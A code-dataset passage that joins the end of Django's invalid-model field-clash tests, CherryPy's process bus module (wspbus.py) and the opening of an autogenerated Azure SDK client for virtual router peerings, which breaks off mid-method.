id='fields.E304',
),
]
self.assertEqual(errors, expected)
def test_accessor_clash(self):
class Model(models.Model):
model_set = models.ManyToManyField("self", symmetrical=False)
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.model_set' clashes with field name 'Model.model_set'.",
hint=(
"Rename field 'Model.model_set', or add/change a related_name "
"argument to the definition for field 'Model.model_set'."
),
obj=Model._meta.get_field('model_set'),
id='fields.E302',
),
]
self.assertEqual(errors, expected)
def test_reverse_query_name_clash(self):
class Model(models.Model):
model = models.ManyToManyField("self", symmetrical=False)
errors = Model.check()
expected = [
Error(
"Reverse query name for 'Model.model' clashes with field name 'Model.model'.",
hint=(
"Rename field 'Model.model', or add/change a related_name "
"argument to the definition for field 'Model.model'."
),
obj=Model._meta.get_field('model'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
def test_clash_under_explicit_related_name(self):
class Model(models.Model):
clash = models.IntegerField()
m2m = models.ManyToManyField("self", symmetrical=False, related_name='clash')
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.m2m' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.m2m'."
),
obj=Model._meta.get_field('m2m'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.m2m' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.m2m'."
),
obj=Model._meta.get_field('m2m'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
def test_valid_model(self):
class Model(models.Model):
first = models.ManyToManyField("self", symmetrical=False, related_name='first_accessor')
second = models.ManyToManyField("self", symmetrical=False, related_name='second_accessor')
errors = Model.check()
self.assertEqual(errors, [])
@isolate_apps('invalid_models_tests')
class SelfReferentialFKClashTests(SimpleTestCase):
def test_accessor_clash(self):
class Model(models.Model):
model_set = models.ForeignKey("Model", models.CASCADE)
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.model_set' clashes with field name 'Model.model_set'.",
hint=(
"Rename field 'Model.model_set', or add/change "
"a related_name argument to the definition "
"for field 'Model.model_set'."
),
obj=Model._meta.get_field('model_set'),
id='fields.E302',
),
]
self.assertEqual(errors, expected)
def test_reverse_query_name_clash(self):
class Model(models.Model):
model = models.ForeignKey("Model", models.CASCADE)
errors = Model.check()
expected = [
Error(
"Reverse query name for 'Model.model' clashes with field name 'Model.model'.",
hint=(
"Rename field 'Model.model', or add/change a related_name "
"argument to the definition for field 'Model.model'."
),
obj=Model._meta.get_field('model'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
def test_clash_under_explicit_related_name(self):
class Model(models.Model):
clash = models.CharField(max_length=10)
foreign = models.ForeignKey("Model", models.CASCADE, related_name='clash')
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.foreign' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.foreign'."
),
obj=Model._meta.get_field('foreign'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.foreign' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.foreign'."
),
obj=Model._meta.get_field('foreign'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
class ComplexClashTests(SimpleTestCase):
# New tests should not be included here, because this is a single,
# self-contained sanity check, not a test of everything.
def test_complex_clash(self):
class Target(models.Model):
tgt_safe = models.CharField(max_length=10)
clash = models.CharField(max_length=10)
model = models.CharField(max_length=10)
clash1_set = models.CharField(max_length=10)
class Model(models.Model):
src_safe = models.CharField(max_length=10)
foreign_1 = models.ForeignKey(Target, models.CASCADE, related_name='id')
foreign_2 = models.ForeignKey(Target, models.CASCADE, related_name='src_safe')
m2m_1 = models.ManyToManyField(Target, related_name='id')
m2m_2 = models.ManyToManyField(Target, related_name='src_safe')
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.foreign_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.foreign_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.foreign_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.foreign_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E303',
),
Error(
"Reverse accessor for 'Model.foreign_1' clashes with reverse accessor for 'Model.m2m_1'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.foreign_1' or 'Model.m2m_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.foreign_1' clashes with reverse query name for 'Model.m2m_1'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.foreign_1' or 'Model.m2m_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E305',
),
Error(
"Reverse accessor for 'Model.foreign_2' clashes with reverse accessor for 'Model.m2m_2'.",
hint=("Add or change a related_name argument "
"to the definition for 'Model.foreign_2' or 'Model.m2m_2'."),
obj=Model._meta.get_field('foreign_2'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.foreign_2' clashes with reverse query name for 'Model.m2m_2'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.foreign_2' or 'Model.m2m_2'."),
obj=Model._meta.get_field('foreign_2'),
id='fields.E305',
),
Error(
"Reverse accessor for 'Model.m2m_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.m2m_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.m2m_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.m2m_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E303',
),
Error(
"Reverse accessor for 'Model.m2m_1' clashes with reverse accessor for 'Model.foreign_1'.",
hint=("Add or change a related_name argument to the definition "
"for 'Model.m2m_1' or 'Model.foreign_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.m2m_1' clashes with reverse query name for 'Model.foreign_1'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.m2m_1' or 'Model.foreign_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E305',
),
Error(
"Reverse accessor for 'Model.m2m_2' clashes with reverse accessor for 'Model.foreign_2'.",
hint=("Add or change a related_name argument to the definition "
"for 'Model.m2m_2' or 'Model.foreign_2'."),
obj=Model._meta.get_field('m2m_2'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.m2m_2' clashes with reverse query name for 'Model.foreign_2'.",
hint=("Add or change a related_name argument to the definition "
"for 'Model.m2m_2' or 'Model.foreign_2'."),
obj=Model._meta.get_field('m2m_2'),
id='fields.E305',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
class M2mThroughFieldsTests(SimpleTestCase):
def test_m2m_field_argument_validation(self):
"""
ManyToManyField accepts the ``through_fields`` kwarg
only if an intermediary table is specified.
"""
class Fan(models.Model):
pass
with self.assertRaisesMessage(ValueError, 'Cannot specify through_fields without a through model'):
models.ManyToManyField(Fan, through_fields=('f1', 'f2'))
def test_invalid_order(self):
"""
Mixing up the order of link fields to ManyToManyField.through_fields
triggers validation errors.
"""
class Fan(models.Model):
pass
class Event(models.Model):
invitees = models.ManyToManyField(Fan, through='Invitation', through_fields=('invitee', 'event'))
class Invitation(models.Model):
event = models.ForeignKey(Event, models.CASCADE)
invitee = models.ForeignKey(Fan, models.CASCADE)
inviter = models.ForeignKey(Fan, models.CASCADE, related_name='+')
field = Event._meta.get_field('invitees')
errors = field.check(from_model=Event)
expected = [
Error(
"'Invitation.invitee' is not a foreign key to 'Event'.",
hint="Did you mean one of the following foreign keys to 'Event': event?",
obj=field,
id='fields.E339',
),
Error(
"'Invitation.event' is not a foreign key to 'Fan'.",
hint="Did you mean one of the following foreign keys to 'Fan': invitee, inviter?",
obj=field,
id='fields.E339',
),
]
self.assertEqual(expected, errors)
def test_invalid_field(self):
"""
Providing invalid field names to ManyToManyField.through_fields
triggers validation errors.
"""
class Fan(models.Model):
pass
class Event(models.Model):
invitees = models.ManyToManyField(
Fan,
through='Invitation',
through_fields=('invalid_field_1', 'invalid_field_2'),
)
class Invitation(models.Model):
event = models.ForeignKey(Event, models.CASCADE)
invitee = models.ForeignKey(Fan, models.CASCADE)
inviter = models.ForeignKey(Fan, models.CASCADE, related_name='+')
field = Event._meta.get_field('invitees')
errors = field.check(from_model=Event)
expected = [
Error(
"The intermediary model 'invalid_models_tests.Invitation' has no field 'invalid_field_1'.",
hint="Did you mean one of the following foreign keys to 'Event': event?",
obj=field,
id='fields.E338',
),
Error(
"The intermediary model 'invalid_models_tests.Invitation' has no field 'invalid_field_2'.",
hint="Did you mean one of the following foreign keys to 'Fan': invitee, inviter?",
obj=field,
id='fields.E338',
),
]
self.assertEqual(expected, errors)
def test_explicit_field_names(self):
"""
If ``through_fields`` kwarg is given, it must specify both
link fields of the intermediary table.
"""
class Fan(models.Model):
pass
class Event(models.Model):
invitees = models.ManyToManyField(Fan, through='Invitation', through_fields=(None, 'invitee'))
class Invitation(models.Model):
event = models.ForeignKey(Event, models.CASCADE)
invitee = models.ForeignKey(Fan, models.CASCADE)
inviter = models.ForeignKey(Fan, models.CASCADE, related_name='+')
field = Event._meta.get_field('invitees')
errors = field.check(from_model=Event)
expected = [
Error(
"Field specifies 'through_fields' but does not provide the names "
"of the two link fields that should be used for the relation "
"through model 'invalid_models_tests.Invitation'.",
hint="Make sure you specify 'through_fields' as through_fields=('field1', 'field2')",
obj=field,
id='fields.E337')]
self.assertEqual(expected, errors)
def test_superset_foreign_object(self):
class Parent(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
c = models.PositiveIntegerField()
class Meta:
unique_together = (('a', 'b', 'c'),)
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
value = models.CharField(max_length=255)
parent = ForeignObject(
Parent,
on_delete=models.SET_NULL,
from_fields=('a', 'b'),
to_fields=('a', 'b'),
related_name='children',
)
field = Child._meta.get_field('parent')
errors = field.check(from_model=Child)
expected = [
Error(
"No subset of the fields 'a', 'b' on model 'Parent' is unique.",
hint=(
"Add unique=True on any of those fields or add at least "
"a subset of them to a unique_together constraint."
),
obj=field,
id='fields.E310',
),
]
self.assertEqual(expected, errors)
def test_intersection_foreign_object(self):
class Parent(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
c = models.PositiveIntegerField()
d = models.PositiveIntegerField()
class Meta:
unique_together = (('a', 'b', 'c'),)
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
d = models.PositiveIntegerField()
value = models.CharField(max_length=255)
parent = ForeignObject(
Parent,
on_delete=models.SET_NULL,
from_fields=('a', 'b', 'd'),
to_fields=('a', 'b', 'd'),
related_name='children',
)
field = Child._meta.get_field('parent')
errors = field.check(from_model=Child)
expected = [
Error(
"No subset of the fields 'a', 'b', 'd' on model 'Parent' is unique.",
hint=(
"Add unique=True on any of those fields or add at least "
"a subset of them to a unique_together constraint."
),
obj=field,
id='fields.E310',
),
]
self.assertEqual(expected, errors)
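# A minimal sketch of a through_fields declaration that passes the checks
# exercised by M2mThroughFieldsTests above: the tuple names the link field
# back to the source model first ('event'), then the link field to the target
# model ('invitee'). The model and field names are hypothetical and mirror the
# ones used in the tests.
#
#     class Fan(models.Model):
#         pass
#
#     class Event(models.Model):
#         invitees = models.ManyToManyField(
#             'Fan', through='Invitation', through_fields=('event', 'invitee'))
#
#     class Invitation(models.Model):
#         event = models.ForeignKey('Event', models.CASCADE)
#         invitee = models.ForeignKey('Fan', models.CASCADE)
#         inviter = models.ForeignKey('Fan', models.CASCADE, related_name='+')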
| bsd-3-clause |
Arakmar/Sick-Beard | cherrypy/process/wspbus.py | 45 | 14462 | """An implementation of the Web Site Process Bus.
This module is completely standalone, depending only on the stdlib.
Web Site Process Bus
--------------------
A Bus object is used to contain and manage site-wide behavior:
daemonization, HTTP server start/stop, process reload, signal handling,
drop privileges, PID file management, logging for all of these,
and many more.
In addition, a Bus object provides a place for each web framework
to register code that runs in response to site-wide events (like
process start and stop), or which controls or otherwise interacts with
the site-wide components mentioned above. For example, a framework which
uses file-based templates would add known template filenames to an
autoreload component.
Ideally, a Bus object will be flexible enough to be useful in a variety
of invocation scenarios:
1. The deployer starts a site from the command line via a framework-
neutral deployment script; applications from multiple frameworks
are mixed in a single site. Command-line arguments and configuration
files are used to define site-wide components such as the HTTP server,
WSGI component graph, autoreload behavior, signal handling, etc.
2. The deployer starts a site via some other process, such as Apache;
applications from multiple frameworks are mixed in a single site.
Autoreload and signal handling (from Python at least) are disabled.
3. The deployer starts a site via a framework-specific mechanism;
for example, when running tests, exploring tutorials, or deploying
single applications from a single framework. The framework controls
which site-wide components are enabled as it sees fit.
The Bus object in this package uses topic-based publish-subscribe
messaging to accomplish all this. A few topic channels are built in
('start', 'stop', 'exit', 'graceful', 'log', and 'main'). Frameworks and
site containers are free to define their own. If a message is sent to a
channel that has not been defined or has no listeners, there is no effect.
In general, there should only ever be a single Bus object per process.
Frameworks and site containers share a single Bus object by publishing
messages and subscribing listeners.
The Bus object works as a finite state machine which models the current
state of the process. Bus methods move it from one state to another;
those methods then publish to subscribed listeners on the channel for
the new state.
O
|
V
STOPPING --> STOPPED --> EXITING -> X
A A |
| \___ |
| \ |
| V V
STARTED <-- STARTING
"""
import atexit
import os
try:
set
except NameError:
from sets import Set as set
import sys
import threading
import time
import traceback as _traceback
import warnings
# Here I save the value of os.getcwd(), which, if I am imported early enough,
# will be the directory from which the startup script was run. This is needed
# by _do_execv(), to change back to the original directory before execv()ing a
# new process. This is a defense against the application having changed the
# current working directory (which could make sys.executable "not found" if
# sys.executable is a relative-path, and/or cause other problems).
_startup_cwd = os.getcwd()
class ChannelFailures(Exception):
delimiter = '\n'
def __init__(self, *args, **kwargs):
# Don't use 'super' here; Exceptions are old-style in Py2.4
# See http://www.cherrypy.org/ticket/959
Exception.__init__(self, *args, **kwargs)
self._exceptions = list()
def handle_exception(self):
self._exceptions.append(sys.exc_info())
def get_instances(self):
return [instance for cls, instance, traceback in self._exceptions]
def __str__(self):
exception_strings = map(repr, self.get_instances())
return self.delimiter.join(exception_strings)
def __nonzero__(self):
return bool(self._exceptions)
# Use a flag to indicate the state of the bus.
class _StateEnum(object):
class State(object):
name = None
def __repr__(self):
return "states.%s" % self.name
def __setattr__(self, key, value):
if isinstance(value, self.State):
value.name = key
object.__setattr__(self, key, value)
states = _StateEnum()
states.STOPPED = states.State()
states.STARTING = states.State()
states.STARTED = states.State()
states.STOPPING = states.State()
states.EXITING = states.State()
class Bus(object):
"""Process state-machine and messenger for HTTP site deployment.
All listeners for a given channel are guaranteed to be called even
if others at the same channel fail. Each failure is logged, but
execution proceeds on to the next listener. The only way to stop all
processing from inside a listener is to raise SystemExit and stop the
whole server.
"""
states = states
state = states.STOPPED
execv = False
def __init__(self):
self.execv = False
self.state = states.STOPPED
self.listeners = dict(
[(channel, set()) for channel
in ('start', 'stop', 'exit', 'graceful', 'log', 'main')])
self._priorities = {}
def subscribe(self, channel, callback, priority=None):
"""Add the given callback at the given channel (if not present)."""
if channel not in self.listeners:
self.listeners[channel] = set()
self.listeners[channel].add(callback)
if priority is None:
priority = getattr(callback, 'priority', 50)
self._priorities[(channel, callback)] = priority
def unsubscribe(self, channel, callback):
"""Discard the given callback (if present)."""
listeners = self.listeners.get(channel)
if listeners and callback in listeners:
listeners.discard(callback)
del self._priorities[(channel, callback)]
def publish(self, channel, *args, **kwargs):
"""Return output of all subscribers for the given channel."""
if channel not in self.listeners:
return []
exc = ChannelFailures()
output = []
items = [(self._priorities[(channel, listener)], listener)
for listener in self.listeners[channel]]
items.sort()
for priority, listener in items:
try:
output.append(listener(*args, **kwargs))
except KeyboardInterrupt:
raise
except SystemExit, e:
# If we have previous errors ensure the exit code is non-zero
if exc and e.code == 0:
e.code = 1
raise
except:
exc.handle_exception()
if channel == 'log':
# Assume any further messages to 'log' will fail.
pass
else:
self.log("Error in %r listener %r" % (channel, listener),
level=40, traceback=True)
if exc:
raise exc
return output
def _clean_exit(self):
"""An atexit handler which asserts the Bus is not running."""
if self.state != states.EXITING:
warnings.warn(
"The main thread is exiting, but the Bus is in the %r state; "
"shutting it down automatically now. You must either call "
"bus.block() after start(), or call bus.exit() before the "
"main thread exits." % self.state, RuntimeWarning)
self.exit()
def start(self):
"""Start all services."""
atexit.register(self._clean_exit)
self.state = states.STARTING
self.log('Bus STARTING')
try:
self.publish('start')
self.state = states.STARTED
self.log('Bus STARTED')
except (KeyboardInterrupt, SystemExit):
raise
except:
self.log("Shutting down due to error in start listener:",
level=40, traceback=True)
e_info = sys.exc_info()
try:
self.exit()
except:
# Any stop/exit errors will be logged inside publish().
pass
raise e_info[0], e_info[1], e_info[2]
def exit(self):
"""Stop all services and prepare to exit the process."""
exitstate = self.state
try:
self.stop()
self.state = states.EXITING
self.log('Bus EXITING')
self.publish('exit')
# This isn't strictly necessary, but it's better than seeing
# "Waiting for child threads to terminate..." and then nothing.
self.log('Bus EXITED')
except:
# This method is often called asynchronously (whether thread,
# signal handler, console handler, or atexit handler), so we
# can't just let exceptions propagate out unhandled.
# Assume it's been logged and just die.
os._exit(70) # EX_SOFTWARE
if exitstate == states.STARTING:
# exit() was called before start() finished, possibly due to
# Ctrl-C because a start listener got stuck. In this case,
# we could get stuck in a loop where Ctrl-C never exits the
            # process, so we just call os._exit here.
os._exit(70) # EX_SOFTWARE
def restart(self):
"""Restart the process (may close connections).
This method does not restart the process from the calling thread;
instead, it stops the bus and asks the main thread to call execv.
"""
self.execv = True
self.exit()
def graceful(self):
"""Advise all services to reload."""
self.log('Bus graceful')
self.publish('graceful')
def block(self, interval=0.1):
"""Wait for the EXITING state, KeyboardInterrupt or SystemExit.
This function is intended to be called only by the main thread.
After waiting for the EXITING state, it also waits for all threads
to terminate, and then calls os.execv if self.execv is True. This
design allows another thread to call bus.restart, yet have the main
thread perform the actual execv call (required on some platforms).
"""
try:
self.wait(states.EXITING, interval=interval, channel='main')
except (KeyboardInterrupt, IOError):
# The time.sleep call might raise
# "IOError: [Errno 4] Interrupted function call" on KBInt.
self.log('Keyboard Interrupt: shutting down bus')
self.exit()
except SystemExit:
self.log('SystemExit raised: shutting down bus')
self.exit()
raise
# Waiting for ALL child threads to finish is necessary on OS X.
# See http://www.cherrypy.org/ticket/581.
# It's also good to let them all shut down before allowing
# the main thread to call atexit handlers.
# See http://www.cherrypy.org/ticket/751.
self.log("Waiting for child threads to terminate...")
for t in threading.enumerate():
if t != threading.currentThread() and t.isAlive():
# Note that any dummy (external) threads are always daemonic.
if hasattr(threading.Thread, "daemon"):
# Python 2.6+
d = t.daemon
else:
d = t.isDaemon()
if not d:
t.join()
if self.execv:
self._do_execv()
def wait(self, state, interval=0.1, channel=None):
"""Wait for the given state(s)."""
if isinstance(state, (tuple, list)):
states = state
else:
states = [state]
def _wait():
while self.state not in states:
time.sleep(interval)
self.publish(channel)
# From http://psyco.sourceforge.net/psycoguide/bugs.html:
# "The compiled machine code does not include the regular polling
# done by Python, meaning that a KeyboardInterrupt will not be
# detected before execution comes back to the regular Python
# interpreter. Your program cannot be interrupted if caught
# into an infinite Psyco-compiled loop."
try:
sys.modules['psyco'].cannotcompile(_wait)
except (KeyError, AttributeError):
pass
_wait()
def _do_execv(self):
"""Re-execute the current process.
This must be called from the main thread, because certain platforms
(OS X) don't allow execv to be called in a child thread very well.
"""
args = sys.argv[:]
self.log('Re-spawning %s' % ' '.join(args))
args.insert(0, sys.executable)
if sys.platform == 'win32':
args = ['"%s"' % arg for arg in args]
os.chdir(_startup_cwd)
os.execv(sys.executable, args)
def stop(self):
"""Stop all services."""
self.state = states.STOPPING
self.log('Bus STOPPING')
self.publish('stop')
self.state = states.STOPPED
self.log('Bus STOPPED')
def start_with_callback(self, func, args=None, kwargs=None):
"""Start 'func' in a new thread T, then start self (and return T)."""
if args is None:
args = ()
if kwargs is None:
kwargs = {}
args = (func,) + args
def _callback(func, *a, **kw):
self.wait(states.STARTED)
func(*a, **kw)
t = threading.Thread(target=_callback, args=args, kwargs=kwargs)
t.setName('Bus Callback ' + t.getName())
t.start()
self.start()
return t
def log(self, msg="", level=20, traceback=False):
"""Log the given message. Append the last traceback if requested."""
if traceback:
exc = sys.exc_info()
msg += "\n" + "".join(_traceback.format_exception(*exc))
self.publish('log', msg, level)
bus = Bus()
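# A minimal usage sketch of the publish/subscribe flow described in the module
# docstring. The listener names 'on_start' and 'on_stop' are hypothetical and
# exist only for this example; everything else uses the Bus API defined above.
if __name__ == '__main__':
    def on_start():
        bus.log('demo listener: site services starting')
    def on_stop():
        bus.log('demo listener: site services stopping')
    bus.subscribe('start', on_start)
    bus.subscribe('stop', on_stop)
    bus.start()  # STOPPED -> STARTING -> STARTED; publishes on the 'start' channel
    bus.exit()   # STOPPING -> STOPPED -> EXITING; publishes 'stop' and then 'exit'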
| gpl-3.0 |
Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_08_01/operations/_virtual_router_peerings_operations.py | 1 | 22472 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualRouterPeeringsOperations(object):
"""VirtualRouterPeeringsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified peering from a Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
peering_name=peering_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualRouterPeering"
"""Gets the specified Virtual Router Peering.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the Virtual Router Peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualRouterPeering, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.VirtualRouterPeering
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
parameters, # type: "_models.VirtualRouterPeering"
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualRouterPeering"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
